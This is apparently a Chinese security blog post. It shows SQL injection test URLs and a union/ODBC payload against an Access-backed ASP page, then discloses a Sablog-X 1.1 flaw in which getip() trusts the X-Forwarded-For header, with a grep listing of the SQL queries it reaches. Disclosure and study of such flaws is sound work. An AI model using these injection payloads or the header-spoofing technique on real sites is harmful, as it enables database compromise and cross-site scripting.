Chinadu's Blog

      http://127.0.0.1/dangjian/read.asp?articleid=154%20AND%201=(SELECT%20%20top%201%201%20from%20MSysAccessObjects
　　测试sandbox是否打开，报错则未打开
　　http://127.0.0.1/dangjian/read.asp?articleid=154%20AND%201=(SELECT%20%20top%201%20cudir()%20from%20MSysAccessObjects
　　Microsoft JET Database Engine (0x80040E14)
　　表达式中 'cudir' 函数未定义。
　　发送数据：
　　SELECT id FROM users WHERE username ='1'and password='' union SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=<Server>,<Port>; DATABASE=master; Trusted_Connection=Yes].Information_Schema.Tables where '1'='1'or'1'='1'

Sablog-X Ver 1.1 getip() Vulnerability

getip()过滤不严导致sql/xss等攻击。

sablog\include\common.php
--------code-------------
function getip() {
if (isset($_SERVER)) {
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$realip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {
$realip = $_SERVER['HTTP_CLIENT_IP'];
} else {
$realip = $_SERVER['REMOTE_ADDR'];
}
} else {
if (getenv("HTTP_X_FORWARDED_FOR")) {
$realip = getenv( "HTTP_X_FORWARDED_FOR");
} elseif (getenv("HTTP_CLIENT_IP")) {
$realip = getenv("HTTP_CLIENT_IP");
} else {
$realip = getenv("REMOTE_ADDR");
}
}
return $realip;
}
--------code-------------

D:\>Findstr /S /I /N /d:D:\phproot\sablog "getip" *.php
D:\phproot\sablog:
post.php:93: $DB->query("Insert INTO ".$db_prefix."users VALUES ('', '".$username."', '".md5($password)."', '".$email."', '".$url."', '".time()."', '".getip()."', '0', '')");
post.php:181: if (preg_match("/^$ban_ip/", getip())) {
post.php:320: $DB->query("Insert INTO ".$db_prefix."comments (articleid, authorid, author, url, email, dateline, content, ipaddress, visible) VALUES ('".$articleid."', '".$userid."', '".$username."', '".$url."', '".$email."', '".time()."', '".$content."', '".getip()."', '".$visible."')");
post.php:379: $query = $DB->query("Select searchid, dateline, ('".$options['search_post_space']."'<>'0' AND ".time()."-dateline< ".$options['search_post_space'].") AS flood, searchfrom='".$searchfrom."' AND keywords='".$keywords."' AS indexvalid FROM ".$db_prefix."searchindex Where ('".$options['search_post_space']."'<>'0' AND ipaddress='".getip()."' AND ".time()."-dateline< ".$options['search_post_space'].") orDER BY flood");
post.php:475: $DB->query("Insert INTO ".$db_prefix."searchindex (keywords, dateline, sortby, orderby, tatols, ids, searchfrom, ipaddress) VALUES ('".$keywords."', '".time()."', '".$sortby."', '".$orderby."', '".$tatols."', '".$ids."', '".$searchfrom."', '".getip()."')");
trackback.php:80: $query = $DB->query("Select trackbackid FROM ".$db_prefix."trackbacks Where ipaddress='".getip()."' AND dateline+".$interval.">='".time()."'");
trackback.php:98: $query = $DB->query("Select title,ipaddress,articleid FROM ".$db_prefix."trackbacks Where ipaddress='".getip()."' or articleid='".$articleid."'");
trackback.php:101: if ($trackback['title'] == $title && $trackback['ipaddress'] == getip()) {
trackback.php:105: if ($trackback['ipaddress'] == getip() && $trackback['articleid'] == $articleid) {
trackback.php:185: $DB->query("Insert INTO ".$db_prefix."trackbacks (articleid, title, dateline, excerpt, url, blog_name, ipaddress, visible, point) VALUES('".$articleid."', '".$title."', '".time()."', '".$excerpt."', '".$url."', '".$blog_name."', '".getip()."', '".$visible."', '".$point."')");
include\common.php:168:function getip() {
include\common.php:219:if ($_COOKIE["UserIP"] !== getip()) {
include\common.php:220: setcookie ("UserIP", getip(), time()+(24*3600));
admin\adminfunctions.php:128: $DB->query("Insert INTO ".$db_prefix."loginlog (username,dateline,ipaddress,result) VALUES ('".addslashes($username)."','".time()."','".getip()."','".$result."')");

admin\adminfunctions.php:137: $DB->query("Insert INTO ".$db_prefix."adminlog (action,script,dateline,ipaddress,username) VALUES ('".htmlspecialchars(trim($action))."','".htmlspecialchars(trim($script))."','".time()."','".getip()."','".$_SESSION['admin_username']."')");

admin\global.php:70: $DB->unbuffered_query("Update ".$db_prefix."admin SET logincount=logincount+1, logintime='".time()."', loginip='".getip()."' Where username='".$username."'");

wap\global.php:228: $DB->query("Insert INTO ".$db_prefix."loginlog (username,dateline,ipaddress,result) VALUES ('".addslashes($username)."','".time()."','".getip()."','".$result."')");
wap\index.php:329: $query = $DB->query("Select searchid, dateline, ('".$options['search_post_space']."'<>'0' AND ".time()."-dateline< ".$options['search_post_space'].") AS flood, searchfrom='article' AND keywords='".$keywords."' AS indexvalid FROM ".$db_prefix."searchindex Where ('".$options['search_post_space']."'<>'0' AND ipaddress='".getip()."' AND ".time()."-dateline< ".$options['search_post_space'].") orDER BY flood");
wap\index.php:376: $DB->query("Insert INTO ".$db_prefix."searchindex (keywords, dateline, sortby, orderby, tatols, ids, searchfrom, ipaddress) VALUES ('".$keywords."', '".time()."', 'dateline', 'desc', '".$tatols."', '".$ids."', 'article', '".getip()."')");
wap\index.php:622: $DB->unbuffered_query("Update ".$db_prefix."admin SET logincount=logincount+1, logintime='".time()."', loginip='".getip()."' Where username='".$username."'");
wap\index.php:686: if (preg_match("/^$ban_ip/", getip())) {
wap\index.php:762: if (preg_match("/^$ban_ip/", getip())) {
wap\index.php:812: $DB->query("Insert INTO ".$db_prefix."comments (articleid, authorid, author, url, email, dateline, content, ipaddress, visible) VALUES ('".$articleid."', '".$userid."', '".$username."', '".$url."', '".$email."', '".time()."', '".$content."', '".getip()."', '".$visible."')");